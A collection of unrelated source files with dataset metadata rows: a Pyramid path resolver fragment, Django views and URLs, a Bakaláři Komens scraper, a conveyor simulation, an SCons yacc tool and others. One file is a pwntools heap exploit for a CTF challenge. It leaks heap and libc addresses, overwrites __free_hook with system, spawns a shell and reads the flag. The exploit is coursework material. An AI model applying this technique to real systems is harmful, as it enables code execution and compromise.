``package``, the resolver will treat relative dotted names as relative to
the caller of the :meth:`~pyramid.path.DottedNameResolver.resolve`
method.
If a *module* or *module name* (as opposed to a package or package name)
is supplied as ``package``, its containing package is computed and this
package used to derive the package name (all names are resolved relative
to packages, never to modules). For example, if the ``package`` argument
to this type was passed the string ``xml.dom.expatbuilder``, and
``.mindom`` is supplied to the
:meth:`~pyramid.path.DottedNameResolver.resolve` method, the resulting
import would be for ``xml.minidom``, because ``xml.dom.expatbuilder`` is
a module object, not a package object.
If a *package* or *package name* (as opposed to a module or module name)
is supplied as ``package``, this package will be used to relative compute
dotted names. For example, if the ``package`` argument to this type was
passed the string ``xml.dom``, and ``.minidom`` is supplied to the
:meth:`~pyramid.path.DottedNameResolver.resolve` method, the resulting
import would be for ``xml.minidom``.
"""
def resolve(self, dotted):
"""
This method resolves a dotted name reference to a global Python
object (an object which can be imported) to the object itself.
Two dotted name styles are supported:
- ``pkg_resources``-style dotted names where non-module attributes
of a package are separated from the rest of the path using a ``:``
e.g. ``package.module:attr``.
- ``zope.dottedname``-style dotted names where non-module
attributes of a package are separated from the rest of the path
using a ``.`` e.g. ``package.module.attr``.
These styles can be used interchangeably. If the supplied name
contains a ``:`` (colon), the ``pkg_resources`` resolution
mechanism will be chosen, otherwise the ``zope.dottedname``
resolution mechanism will be chosen.
If the ``dotted`` argument passed to this method is not a string, a
:exc:`ValueError` will be raised.
When a dotted name cannot be resolved, a :exc:`ValueError` error is
raised.
Example:
.. code-block:: python
r = DottedNameResolver()
v = r.resolve('xml') # v is the xml module
"""
if not isinstance(dotted, basestring):
raise ValueError('%r is not a string' % (dotted,))
package = self.package
if package is CALLER_PACKAGE:
package = caller_package()
return self._resolve(dotted, package)
def maybe_resolve(self, dotted):
"""
This method behaves just like
:meth:`~pyramid.path.DottedNameResolver.resolve`, except if the
``dotted`` value passed is not a string, it is simply returned. For
example:
.. code-block:: python
import xml
r = DottedNameResolver()
v = r.maybe_resolve(xml)
# v is the xml module; no exception raised
"""
if isinstance(dotted, basestring):
package = self.package
if package is CALLER_PACKAGE:
package = caller_package()
return self._resolve(dotted, package)
return dotted
def _resolve(self, dotted, package):
if ':' in dotted:
return self._pkg_resources_style(dotted, package)
else:
return self._zope_dottedname_style(dotted, package)
def _pkg_resources_style(self, value, package):
""" package.module:attr style """
if value.startswith('.') or value.startswith(':'):
if not package:
raise ValueError(
'relative name %r irresolveable without package' % (value,)
)
if value in ['.', ':']:
value = package.__name__
else:
value = package.__name__ + value
return pkg_resources.EntryPoint.parse(
'x=%s' % value).load(False)
    def _zope_dottedname_style(self, value, package):
        """ package.module.attr style

        Resolves an all-dots name, optionally relative to ``package``:
        a bare ``.`` means the package itself, and each *extra* leading
        dot strips one trailing component off the package path before
        appending the rest of the name.
        """
        module = getattr(package, '__name__', None) # package may be None
        if not module:
            module = None
        if value == '.':
            # Bare dot: resolve to the anchor package itself.
            if module is None:
                raise ValueError(
                    'relative name %r irresolveable without package' % (value,)
                )
            name = module.split('.')
        else:
            name = value.split('.')
        if not name[0]:
            # Empty first segment => the name started with a dot, i.e. it
            # is relative and needs the anchor package.
            if module is None:
                raise ValueError(
                    'relative name %r irresolveable without '
                    'package' % (value,)
                )
            module = module.split('.')
            name.pop(0)
            # Each additional leading dot walks one level up the package.
            while not name[0]:
                module.pop()
                name.pop(0)
            name = module + name
        used = name.pop(0)
        found = __import__(used)
        # Walk the remaining segments; on an AttributeError the segment is
        # a submodule that has not been imported yet, so import and retry.
        for n in name:
            used += '.' + n
            try:
                found = getattr(found, n)
            except AttributeError:
                __import__(used)
                found = getattr(found, n) # pragma: no cover
        return found
def resolve_name(name, package=None):
    """Resolve a dotted *name* into the Python object living at that path.

    Thin convenience wrapper around :class:`DottedNameResolver`.  The
    optional *package* anchors relative references; when omitted, only
    absolute paths are supported.
    """
    resolver = DottedNameResolver(package)
    return resolver.resolve(name)
| mozilla-services/metlog-py | metlog/path.py | path.py | py | 10,676 | python | en | code | 37 | github-code | 90 |
548197620 | from django.shortcuts import render,get_object_or_404,redirect
from django.contrib.auth.decorators import login_required
from .models import Profile,Project
from .forms import PostProject,UpdateUser,UpdateProfile,Votes
from django.contrib.auth.models import User
from rest_framework.views import APIView
from rest_framework.response import Response
from .serializers import ProjectSerailizer,UserSerializer
from rest_framework import status
from .permission import IsAdminOrReadOnly
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.contrib import messages
import numpy as np
# Create your views here.
class ProjectList(APIView):
    """List every project, or create a new one from posted data.

    FIXES over the original:
    - ``@login_required`` was applied to a bound APIView method; the
      decorator expects the request as its first positional argument but
      receives ``self``, so it breaks at runtime.  DRF authentication is
      handled by ``permission_classes`` instead.
    - ``permission_classes`` was assigned as a useless local inside
      ``post`` and again *after* the method definitions; it is now a
      single class attribute where DRF actually looks for it.
    """
    permission_classes = (IsAdminOrReadOnly,)

    def get(self, response, format=None):
        """Return all projects, serialized."""
        projects = Project.objects.all()
        serializer = ProjectSerailizer(projects, many=True)
        return Response(serializer.data)

    def post(self, request, format=None):
        """Create a project; 201 on success, 400 with errors otherwise."""
        serializer = ProjectSerailizer(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class UserList(APIView):
    """Read-only listing of every registered user."""

    def get(self, response, format=None):
        """Return all users, serialized."""
        all_users = User.objects.all()
        return Response(UserSerializer(all_users, many=True).data)
#GETS A PROJECT BY AN ID
class ProjectDescription(APIView):
    """Retrieve, update or delete a single project by primary key."""
    permission_classes = (IsAdminOrReadOnly,)

    def get_project(self, pk):
        """404-raising lookup helper."""
        return get_object_or_404(Project, pk=pk)

    def get(self, request, pk, format=None):
        """Return one project by id."""
        serializer = ProjectSerailizer(self.get_project(pk))
        return Response(serializer.data)

    def put(self, request, pk, format=None):
        """Replace a project's data; 400 with errors when invalid."""
        serializer = ProjectSerailizer(self.get_project(pk), request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return Response(serializer.data)

    def delete(self, request, pk, format=None):
        """Delete a project and answer 204."""
        self.get_project(pk).delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
#GETS USER BY ID
class UserDescription(APIView):
    """Retrieve, update or delete a single user by primary key."""
    permission_classes=(IsAdminOrReadOnly,)
    def get_user(self,pk):
        # 404-raising lookup helper shared by the verbs below.
        return get_object_or_404(User,pk=pk)
    # Gets a user by id.
    def get(self, request, pk ,format=None):
        user= self.get_user(pk)
        serializer=UserSerializer(user)
        return Response(serializer.data)
    # Updates a specific user; 400 with validation errors when invalid.
    def put(self, request,pk, format=None):
        user=self.get_user(pk)
        serializer=UserSerializer(user,request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data)
        else:
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    # Deletes a user and answers 204.
    def delete(self,request,pk,format=None):
        user=self.get_user(pk)
        user.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
#Index view
def index(request):
    """Landing page: every project, newest first."""
    latest_projects = Project.objects.order_by('-posted')
    return render(request, 'project/index.html', {'projects': latest_projects})
#user profile
@login_required
def profile(request):
    """Render the logged-in user's profile page.

    The template reads the user from the request context directly, so no
    extra context is passed here.
    """
    # profile = Profile.objects.create(user=request.user)
    return render(request,'project/profile.html')
#specific project
@login_required
def project(request, project_id):
    """Show a single project, its votes, and the mean of all ratings.

    FIXES over the original:
    - ``vote_mean = []`` was reset on every loop iteration, so the mean
      reflected only the *last* vote; ratings from all votes are now
      accumulated before averaging.
    - ``mean`` was unbound when the project had no votes, crashing with
      ``UnboundLocalError`` at ``if mean:``; the mean is now only added
      to the context when at least one rating exists.
    """
    project = get_object_or_404(Project, pk=project_id)
    votes = Votes()
    votes_list = project.votes_set.all()
    ratings = []
    for vote in votes_list:
        # Every vote contributes its three category scores.
        ratings.extend([vote.usability, vote.content, vote.design])
    context = {'project': project, 'votes': votes, 'votes_list': votes_list}
    if ratings:
        context['mean'] = round(np.mean(ratings), 2)
    return render(request, 'project/project.html', context)
@login_required
def new_project(request):
    """Let the logged-in user submit a new project.

    On a valid POST the project is attributed to the current user and the
    visitor is redirected to the index; otherwise the (possibly bound)
    form is re-rendered.
    """
    if request.method == 'POST':
        form = PostProject(request.POST, request.FILES)
        if form.is_valid():
            unsaved = form.save(commit=False)
            unsaved.user = request.user
            unsaved.save()
            return redirect('project:project_index')
    else:
        form = PostProject()
    return render(request, 'project/new_project.html', {'form': form})
@login_required
def posted_by(request, user_id):
    """Page listing the projects posted by one user (or 404)."""
    owner = get_object_or_404(User, pk=user_id)
    return render(request, 'project/posted_by.html', {'user': owner})
@login_required
def vote(request, project_id):
    """Record a rating for a project.

    FIX over the original: the dead ``votes = Votes()`` that was
    immediately overwritten by ``Votes(request.POST)`` is removed.
    Behavior is otherwise unchanged: a valid form is saved with the
    current user attached and redirects back to the project page; an
    invalid one warns and re-renders with a fresh form.
    """
    project = get_object_or_404(Project, pk=project_id)
    votes = Votes(request.POST)
    if votes.is_valid():
        vote = votes.save(commit=False)
        vote.user = request.user
        vote.project = project
        vote.save()
        messages.success(request, 'Votes Successfully submitted')
        return HttpResponseRedirect(reverse('project:project', args=(project.id,)))
    else:
        messages.warning(request, 'ERROR! Voting Range is from 0-10')
        votes = Votes()
    return render(request, 'project/project.html', {'project': project, 'votes': votes})
@login_required
def update_settings(request):
    """Update the current user's account and profile data.

    FIXES over the original:
    - The forms were bound to ``request.POST`` unconditionally, so a
      plain GET validated an empty payload; the save path now runs only
      on POST.
    - ``@login_required`` was missing even though the view dereferences
      ``request.user.profile`` (and every sibling view carries the
      decorator); anonymous access would crash.
    """
    if request.method == 'POST':
        update_user = UpdateUser(request.POST, instance=request.user)
        update_profile = UpdateProfile(request.POST, request.FILES, instance=request.user.profile)
        if update_user.is_valid() and update_profile.is_valid():
            update_user.save()
            update_profile.save()
            messages.success(request, 'Profile Updated Successfully')
            return redirect('project:profile')
    # GET, or invalid POST: show unbound forms (matches original behavior).
    update_user = UpdateUser(instance=request.user)
    update_profile = UpdateProfile(instance=request.user.profile)
    return render(request, 'project/update_profile.html', {'update_user': update_user, 'update_profile': update_profile})
#API PAGE
def api(request):
    """Render the static API documentation page."""
    return render(request,'project/api.html')
| James19stack/awards | project/views.py | views.py | py | 6,462 | python | en | code | 0 | github-code | 90 |
23470978741 | import csv
# Build the San Pierin dictionary: source word -> its translations.
# FIX: the file handle was never closed; a with-statement guarantees it.
spd = {}
with open('/Users/cdelbasso/Desktop/SPD4FX.csv', 'r') as f:
    reader = csv.reader(f)
    for row in reader:
        # Row layout: [headword, Italian, Croatian, English].
        spd[row[0]] = {'Italian': row[1], 'Croatian': row[2], 'English': row[3]}
| spirito123/SanPierinDictionary | SPD.py | SPD.py | py | 193 | python | en | code | 0 | github-code | 90 |
42716613329 | from django.contrib import admin
from django.urls import path, re_path
from student import views
# URL routes for the student app.
# NOTE(review): these patterns start with "/", which is unconventional for
# Django includes — left unchanged because changing it would change URLs.
urlpatterns = [
    path('/Signout', views.signout),
    path('/dashboard', views.index),
    path('/Signup', views.signup),
    path('/Login', views.Signin, name="login"),
    path('/Register', views.register),
    # path('/dashboard/StudentProfile',views.ShowProfile),
    # FIX: the activation route used a raw regex inside path(), which
    # treats it as a literal string and can never match; re_path()
    # interprets the regex as intended.
    re_path(r'activate/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/', views.activate, name='activate'),
]
| Prathm-s/PlacementMangementSystem | student/urls.py | urls.py | py | 493 | python | en | code | 0 | github-code | 90 |
18309858739 | import sys
def solve():
    """Count the distinct length-3 subsequences of S that use some middle
    character S[i] (0 < i < N-1) together with one character from before
    and one from after it, then print that count.

    Reads two lines from stdin: N, then the string S.
    """
    read = sys.stdin.readline
    n = int(read())
    s = read().strip("\n")
    # prefix[i] / suffix[i]: set of characters occurring in s[:i+1] / s[i:].
    prefix = [set() for _ in range(n)]
    suffix = [set() for _ in range(n)]
    prefix[0].add(s[0])
    suffix[n - 1].add(s[n - 1])
    for i in range(1, n):
        prefix[i] = prefix[i - 1] | {s[i]}
        suffix[n - 1 - i] = suffix[n - i] | {s[n - 1 - i]}
    distinct = set()
    for mid in range(1, n - 1):
        for left_ch in prefix[mid - 1]:
            for right_ch in suffix[mid + 1]:
                distinct.add(left_ch + s[mid] + right_ch)
    print(len(distinct))
    return 0

if __name__ == "__main__":
    solve()
70219890857 | from pwn import *
# CTF heap exploit for the "easyheap" bookstore challenge.
# Overall plan: leak a heap address from a freed chunk, use it to leak a
# libc address, then overwrite __free_hook with system() and free a chunk
# whose contents are "sh" to pop a shell.
HOST, PORT = 'edu-ctf.zoolab.org', 30211
if args.HOST: HOST = args.HOST
if args.PORT: PORT = args.PORT
exe = context.binary = ELF('./easyheap/share/easyheap')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if args.REMOTE:
    io = remote(HOST,PORT)
else:
    env = {}
    io = process(exe.path)
    pause()
# Select a menu option at the "> " prompt.
def menu(opt):
    io.sendlineafter(b'> ', str(opt).encode())
# Read everything up to (but not including) the menu banner.
def recv():
    return io.readuntil(b'--- happy bookstore ---', drop=True)
# Running book index; the binary asks for it explicitly on every add.
size = 0
# Menu 1: allocate a book of `sz` bytes named `name`.
def add(sz, name, price = 0):
    global size
    menu(1)
    io.sendlineafter(b':', str(size).encode())
    size += 1
    io.sendlineafter(b':', str(sz).encode())
    io.sendafter(b':', name)
    io.sendlineafter(b':', str(price).encode())
# Menu 2: free the book at `idx`.
def delete(idx):
    menu(2)
    io.sendlineafter(b':', str(idx).encode())
# Menu 3: rewrite the name/price of the book at `idx`.
def edit(idx, name, price = 0):
    menu(3)
    io.sendlineafter(b':', str(idx).encode())
    io.sendafter(b':', name)
    io.sendlineafter(b':', str(price).encode())
# Menu 4: list all books; parse the listing into (idx, name, price) tuples.
def show():
    menu(4)
    res = recv()
    res = res.split(b'--------------------')
    books = []
    for line in res:
        if line:
            line = line.split(b'Index:\t')[1]
            idx,line = line.split(b'\nName:\t')
            name,line = line.split(b'\nPrice:\t')
            price = line[:-1]
            book = (idx,name,price)
            books.append(book)
    return books
# Menu 5: look up a book by index and return the raw name bytes printed.
def find(idx):
    menu(5)
    io.sendlineafter(b':', str(idx).encode())
    io.readuntil(b': ')
    return recv()[:-1]
# Allocate and free eight 0xb0 chunks; after the frees the listing exposes
# heap data.  NOTE(review): the leak is taken from the *index* field of the
# second listed entry minus 0x10 — presumably a heap pointer left behind in
# the freed chunk; confirm against the binary.
sz = 8
for i in range(sz):
    add(0xb0, b'sh\n')
for i in reversed(range(sz)):
    delete(i)
heap_base = int(show()[1][0]) - 0x10
info(f'heap base: {hex(heap_base)}')
# Large allocation, then a chunk whose contents point back into the heap
# (heap_base + 0x2d0); reading book 3 then leaks a libc pointer.
add(0x100, b'sh\n')
add(0x20, p64(heap_base + 0x2d0))
# 0x1ebc90 is the offset of the leaked pointer inside this glibc build.
libc.address = u64(find(3).ljust(8, b'\0')) - 0x1ebc90
info(f'libc base: {hex(libc.address)}')
# Point book 3's backing pointer at __free_hook via book 9, write system()
# through book 3, then free a chunk containing "sh" -> system("sh").
edit(9, p64(libc.sym['__free_hook']))
edit(3, p64(libc.sym['system']))
delete(1)
if not args.REMOTE:
    io.interactive()
else:
    io.clean(1)
    io.sendline(b'cat /home/`whoami`/flag*')
    flag = io.readuntil(b'}').strip().decode()
    success(flag)
| nella17/NYCU-Secure-Programming-2021 | Pwn/HW-2/easyheap/exploit.py | exploit.py | py | 2,050 | python | en | code | 3 | github-code | 90 |
4295970182 | # +
# +
# Jupytext cell markers ("# +" / "# -") delimit notebook cells in this file.
import requests
HEADERS = {
    "Accept": 'application/json',
}
# Base URL of the Norwegian central register of legal entities (Brreg).
BASE_URL = "https://data.brreg.no/enhetsregisteret/api/"
# Fetch BASE_URL + url as JSON; `params` become the query string.
# NOTE(review): the mutable default `params={}` is benign here (never
# mutated), but `params=None` would be the safer convention.
def get_json(url, params={}):
    url = BASE_URL + url
    req = requests.Request("GET", url=url, headers=HEADERS, params=params)
    #print(req.url, req.headers, req.params)
    # Prepared request exposes the fully resolved URL for debugging.
    print("Full URL, check during testing:", req.prepare().url)
    response = requests.Session().send(req.prepare())
    response.raise_for_status()
    # print(response.text)
    return response.json()
# Smoke test: list entities; "_embedded" holds the result payload.
get_json("enheter")["_embedded"]
# -
| statisticsnorway/speshelse | experimental/brreg_api_test.py | brreg_api_test.py | py | 553 | python | en | code | 0 | github-code | 90 |
2354928047 | import numpy as np
from place import Place
from transition import Transition
from scheduler import BLOCKED, FINISHED
# Positional markers for conveyor operations (beginning/end of the belt;
# ANYWHERE = no specific position).  NOTE(review): not referenced in this
# module's visible code — presumably consumed by importers; confirm.
BEGINNING = 0
END = 1
ANYWHERE = -1
class Conveyor:
    """A conveyor belt modeled as a chain of `capacity` single-slot Places
    connected by Transitions (a Petri-net-like structure).

    Items enter via the first place and are moved one slot per scheduled
    transition firing; `exitPredicateFn` gates whether an item may leave
    the last slot (used to model A-Frame behavior).
    """
    def __init__(self, name, capacity, delay=0, exitPredicateFn = lambda p: True):
        self.capacity = capacity
        # Constant-delay function handed to every Transition.
        self.delayFn = lambda: delay
        self.exitPredicateFn = exitPredicateFn
        self.name = name
        self.enabled = True
        self.places = []
        self.transitions = []
        self.make()
    def make(self):
        """Build the chain of places and transitions."""
        # Standard slot-to-slot move: fires only when the conveyor runs,
        # the downstream place exists, is enabled and not full.
        def conveyorTransitionFn(inputPlaces, outputPlaces, currentTime, phase):
            if len(outputPlaces) == 0:
                return FINISHED
            if self.IsStopped():
                return FINISHED
            outputPlace = outputPlaces[0]
            if outputPlace.IsDisabled():
                return FINISHED
            inputPlace = inputPlaces[0]
            if not outputPlace.IsFull() :
                if not inputPlace.IsEmpty():
                    v = inputPlace.Remove()
                    outputPlace.Add(v)
                return FINISHED
            else:
                # Downstream full: signal the scheduler to retry later.
                return BLOCKED
        def lastTransitionFn(inputPlaces, outputPlaces, currentTime, phase):
            # the last transition is not moving the item to the output place
            # if the exitPredicateFn returns false
            # this is used to model the A-Frame behavior
            inputPlace = inputPlaces[0]
            if not inputPlace.IsEmpty():
                v = inputPlace[0]
                if not self.exitPredicateFn(v):
                    return FINISHED
            return conveyorTransitionFn(inputPlaces, outputPlaces, currentTime, phase)
        prevTransition = None
        # One (place -> transition) pair per slot; each transition's output
        # is the next slot's place, wired up on the following iteration.
        for _ in range(self.capacity):
            newPlace = Place(capacity=1)
            newTransition = Transition(self.delayFn, conveyorTransitionFn)
            self.places.append(newPlace)
            self.transitions.append(newTransition)
            newTransition.AddInputPlace(newPlace)
            if prevTransition is not None:
                prevTransition.AddOutputPlace(newPlace)
            prevTransition = newTransition
        #the last transition has augmented transition action
        self.transitions[-1].SetActionFn(lastTransitionFn)
    def Connect(self, nextPlace):
        """Attach `nextPlace` as the output of the belt's last transition.

        Raises if the conveyor is already connected downstream.
        """
        _, countOutputPlaces = self.transitions[-1].CountPlaces()
        if countOutputPlaces > 0:
            raise Exception(f"The conveyor {self.name} is already connected")
        self.transitions[-1].AddOutputPlace(nextPlace)
    def ScheduleTransitions(self, scheduler, t):
        """Schedule all enabled transitions at time `t`, downstream first
        so a slot empties before the slot behind it tries to fill it."""
        for i in range(len(self.transitions)-1, -1, -1):
            if self.transitions[i].IsEnabled():
                self.transitions[i].ScheduleExecute(scheduler, t)
    def State(self):
        """Fraction of occupied slots (0.0 .. 1.0)."""
        cntFull = 0.0
        for p in self.places:
            if p.IsFull():
                cntFull += 1
        return cntFull / self.capacity
    def DeepState(self):
        """Per-slot item ids (0 for empty slots) as a numpy array.

        NOTE(review): assumes Place supports indexing and items have Id().
        """
        state = np.asarray([0 if p.IsEmpty() else p[0].Id() for p in self.places])
        return state
    def Capacity(self):
        return self.capacity
    def FirstPlace(self):
        """Entry slot of the belt — feed items in here."""
        return self.places[0]
    def Places(self):
        return self.places
    def Stop(self):
        """Halt the belt and refuse new items at the entry slot."""
        self.enabled = False
        self.places[0].Disable()
    def Start(self):
        """Resume the belt and accept items again."""
        self.enabled = True
        self.places[0].Enable()
    def IsStopped(self):
        return self.enabled == False
    def Reset(self):
        """Empty every slot, reset every transition, and restart."""
        for place in self.places:
            if len(place) > 0:
                place.Remove()
        for transition in self.transitions:
            transition.Reset()
        self.Start()
    def Transitions(self):
        return self.transitions
    def __str__(self):
        s = f'{self.name}:'
        for place in self.places:
            s += f' {place}'
        return s
if __name__ == "__main__":
    # Smoke test: push one item through two chained conveyors; the second
    # conveyor stays stopped until t == 22 so the item backs up on c1.
    from scheduler import Scheduler
    scheduler = Scheduler()
    c = Conveyor("c1", 10, 0)
    c2 = Conveyor("c2", 10, 0)
    c.Connect(c2.FirstPlace())
    c2.Stop()
    # FIX: the original called c.PutValue('A'), but Conveyor defines no
    # PutValue method; items are fed into the first place of the belt.
    c.FirstPlace().Add('A')
    print(c)
    for t in range(25):
        if t == 22:
            c2.Start()
        scheduler.Execute(t)
        c.ScheduleTransitions(scheduler, t)
        c2.ScheduleTransitions(scheduler, t)
        scheduler.Execute(t)
        print(t, c, c2)
| vparonov/rlwh | conveyor.py | conveyor.py | py | 4,493 | python | en | code | 0 | github-code | 90 |
71823058538 |
class Scheduler():
    """Step-decay learning-rate schedule applied to a torch-style optimizer."""

    def __init__(self, optimizer, lr, decay=0.3, lr_decay_epoch=100):
        """
        Args:
            optimizer: optimizer whose ``param_groups`` get rescaled
            lr: initial learning rate
            decay: multiplicative decay factor
            lr_decay_epoch: number of epochs per decay step
        """
        self.optimizer = optimizer
        self.lr = lr
        self.decay = decay
        self.lr_decay_epoch = lr_decay_epoch

    def step(self, epoch):
        """Write the decayed rate into every param group and return the optimizer.

        NOTE(review): the write-back only happens every 10 epochs
        (hard-coded), not every ``lr_decay_epoch`` — looks intentional
        but worth confirming.
        """
        decayed = self.lr * self.decay ** int(epoch / self.lr_decay_epoch)
        if epoch % 10 == 0 and epoch > 0:
            for group in self.optimizer.param_groups:
                group['lr'] = decayed
        return self.optimizer
42940227572 | """Modul obsahující funkce týkající se Komens zpráv."""
from __future__ import annotations
from datetime import datetime
from typing import cast
from bs4 import BeautifulSoup
from bs4.element import Tag # Kvůli mypy - https://github.com/python/mypy/issues/10826
from ..bakalari import BakalariAPI, Endpoint, _register_parser, _register_resolver
from ..exceptions import MissingElementError
from ..looting import GetterOutput, ResultSet
from ..objects import Komens, KomensFile, UnresolvedID
from ..sessions import RequestsSession
from ..utils import parseHTML
def getter_komens_ids(
    bakalariAPI: BakalariAPI,
    from_date: datetime | None = None,
    to_date: datetime | None = None,
) -> GetterOutput[BeautifulSoup]:
    """Fetch the Komens message overview and return the parsed page.

    Optional ``from_date`` / ``to_date`` restrict the range via the
    ``?s=custom`` query.  Bakaláři returns at most 300 messages per
    request, a limitation of the site itself.
    """
    url = bakalariAPI.get_endpoint(Endpoint.KOMENS)
    if from_date is not None or to_date is not None:
        query = ["s=custom"]
        if from_date is not None:
            query.append("from=" + from_date.strftime("%d%m%Y"))
        if to_date is not None:
            query.append("to=" + to_date.strftime("%d%m%Y"))
        url += "?" + "&".join(query)
    with bakalariAPI.session_manager.get_session_or_create(RequestsSession) as session:
        response = session.get(url)
    return GetterOutput(Endpoint.KOMENS, parseHTML(response.content))
def getter_info(
    bakalariAPI: BakalariAPI, ID: str, context: str = "prijate"
) -> GetterOutput[dict]:
    """POST for the detail JSON of one Komens message.

    ``context`` selects the message folder ("prijate" = received).
    """
    payload = {"idmsg": ID, "context": context}
    with bakalariAPI.session_manager.get_session_or_create(RequestsSession) as session:
        data = session.post(
            bakalariAPI.get_endpoint(Endpoint.KOMENS_GET), json=payload
        ).json()
    return GetterOutput(Endpoint.KOMENS_GET, data)
@_register_parser(Endpoint.KOMENS, BeautifulSoup)
def parser_main(getter_output: GetterOutput[BeautifulSoup]) -> ResultSet:
    """Extract the message IDs from the Komens overview page as
    :class:`UnresolvedID` loot, one per listed message.

    Raises :exc:`MissingElementError` when the expected page structure
    is not found.
    """
    output = ResultSet()
    # None-aware operators (PEP 505) are deferred... Sadge
    # komens_list = getter_output.data.find(id="message_list_content")?.find("ul")?.find_all("li", recursive=False)
    x = getter_output.data.find(id="message_list_content")
    if x is None:
        raise MissingElementError('find(id="message_list_content")')
    x = cast(Tag, x.find("ul"))
    if x is None:
        raise MissingElementError('find(id="message_list_content").find("ul")')
    # `cast()` because `find()` can also return a NavigableString, which has no `find_all()` (so we couldn't call it)...
    komens_list = cast(list[Tag], x("li", recursive=False))
    for komens in komens_list:
        table = cast(Tag, komens.find("table"))
        if table is None:
            raise MissingElementError('komens.find("table")')
        # `cast()` to string, because the attribute may also be multivalued (=> list), which shouldn't happen for "data-idmsg" though
        output.add_loot(UnresolvedID(cast(str, table["data-idmsg"]), Komens))
    return output
@_register_parser(Endpoint.KOMENS_GET, dict)
def parser_info(getter_output: GetterOutput[dict]) -> ResultSet:
    """Build a :class:`Komens` (plus its :class:`KomensFile` attachments)
    from the message-detail JSON."""
    data = getter_output.data
    output = ResultSet()
    # Attachments first, so the Komens object can reference them.
    for attachment in data["Files"]:
        output.add_loot(
            KomensFile(
                attachment["id"],
                attachment["name"],
                attachment["Size"],
                attachment["type"],
                attachment["idmsg"],
                attachment["path"],
            )
        )
    return output.add_loot(
        Komens(
            data["Id"],
            data["Jmeno"],
            data["MessageText"],
            datetime.strptime(data["Cas"], "%d.%m.%Y %H:%M"),
            data["MohuPotvrdit"],
            data["Potvrzeno"],
            data["Kind"],
            output.get(KomensFile),
        )
    )
@_register_resolver(Komens)
def resolver(bakalariAPI: BakalariAPI, unresolved: UnresolvedID) -> Komens:
    # Fetch the detail JSON for the unresolved ID and return the single
    # Komens object parsed out of it.
    return parser_info(getter_info(bakalariAPI, unresolved.ID)).get(Komens)[0]
| Hackrrr/BakalariAPI | src/bakalariapi/modules/komens.py | komens.py | py | 3,992 | python | en | code | 4 | github-code | 90 |
42008616083 | __revision__ = "src/engine/SCons/Tool/yacc.py 5134 2010/08/16 23:02:40 bdeegan"
import os.path
import SCons.Defaults
import SCons.Tool
import SCons.Util
YaccAction = SCons.Action.Action("$YACCCOM", "$YACCCOMSTR")
def _yaccEmitter(target, source, env, ysuf, hsuf):
    """Shared SCons emitter for yacc/bison sources.

    Inspects $YACCFLAGS and appends the extra files yacc will generate
    (header for -d, .vcg graph for -g, and any --defines=/--graph=
    targets) so SCons tracks them as build outputs.
    """
    yaccflags = env.subst("$YACCFLAGS", target=target, source=source)
    flags = SCons.Util.CLVar(yaccflags)
    targetBase, targetExt = os.path.splitext(SCons.Util.to_String(target[0]))
    if '.ym' in ysuf: # If using Objective-C
        target = [targetBase + ".m"] # the extension is ".m".
    # If -d is specified on the command line, yacc will emit a .h
    # or .hpp file with the same name as the .c or .cpp output file.
    if '-d' in flags:
        target.append(targetBase + env.subst(hsuf, target=target, source=source))
    # If -g is specified on the command line, yacc will emit a .vcg
    # file with the same base name as the .y, .yacc, .ym or .yy file.
    if "-g" in flags:
        base, ext = os.path.splitext(SCons.Util.to_String(source[0]))
        target.append(base + env.subst("$YACCVCGFILESUFFIX"))
    # With --defines and --graph, the name of the file is totally defined
    # in the options.
    fileGenOptions = ["--defines=", "--graph="]
    for option in flags:
        for fileGenOption in fileGenOptions:
            l = len(fileGenOption)
            if option[:l] == fileGenOption:
                # A file generating option is present, so add the file
                # name to the list of targets.
                fileName = option[l:].strip()
                target.append(fileName)
    return (target, source)
def yEmitter(target, source, env):
    """Emitter for C yacc sources (.y/.yacc); header suffix is $YACCHFILESUFFIX."""
    return _yaccEmitter(target, source, env, ['.y', '.yacc'], '$YACCHFILESUFFIX')
def ymEmitter(target, source, env):
    """Emitter for Objective-C yacc sources (.ym); header suffix is $YACCHFILESUFFIX."""
    return _yaccEmitter(target, source, env, ['.ym'], '$YACCHFILESUFFIX')
def yyEmitter(target, source, env):
    """Emitter for C++ yacc sources (.yy); header suffix is $YACCHXXFILESUFFIX."""
    return _yaccEmitter(target, source, env, ['.yy'], '$YACCHXXFILESUFFIX')
def generate(env):
    """Add Builders and construction variables for yacc to an Environment."""
    c_file, cxx_file = SCons.Tool.createCFileBuilders(env)
    # C
    c_file.add_action('.y', YaccAction)
    c_file.add_emitter('.y', yEmitter)
    c_file.add_action('.yacc', YaccAction)
    c_file.add_emitter('.yacc', yEmitter)
    # Objective-C
    c_file.add_action('.ym', YaccAction)
    c_file.add_emitter('.ym', ymEmitter)
    # C++
    cxx_file.add_action('.yy', YaccAction)
    cxx_file.add_emitter('.yy', yyEmitter)
    # Prefer bison when available, fall back to plain yacc.
    env['YACC'] = env.Detect('bison') or 'yacc'
    env['YACCFLAGS'] = SCons.Util.CLVar('')
    env['YACCCOM'] = '$YACC $YACCFLAGS -o $TARGET $SOURCES'
    env['YACCHFILESUFFIX'] = '.h'
    # Apparently, OS X now creates file.hpp like everybody else
    # I have no idea when it changed; it was fixed in 10.4
    #if env['PLATFORM'] == 'darwin':
    #    # Bison on Mac OS X just appends ".h" to the generated target .cc
    #    # or .cpp file name.  Hooray for delayed expansion of variables.
    #    env['YACCHXXFILESUFFIX'] = '${TARGET.suffix}.h'
    #else:
    #    env['YACCHXXFILESUFFIX'] = '.hpp'
    env['YACCHXXFILESUFFIX'] = '.hpp'
    env['YACCVCGFILESUFFIX'] = '.vcg'
def exists(env):
    """Return a truthy path when bison or yacc is available on this system."""
    return env.Detect(['bison', 'yacc'])
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
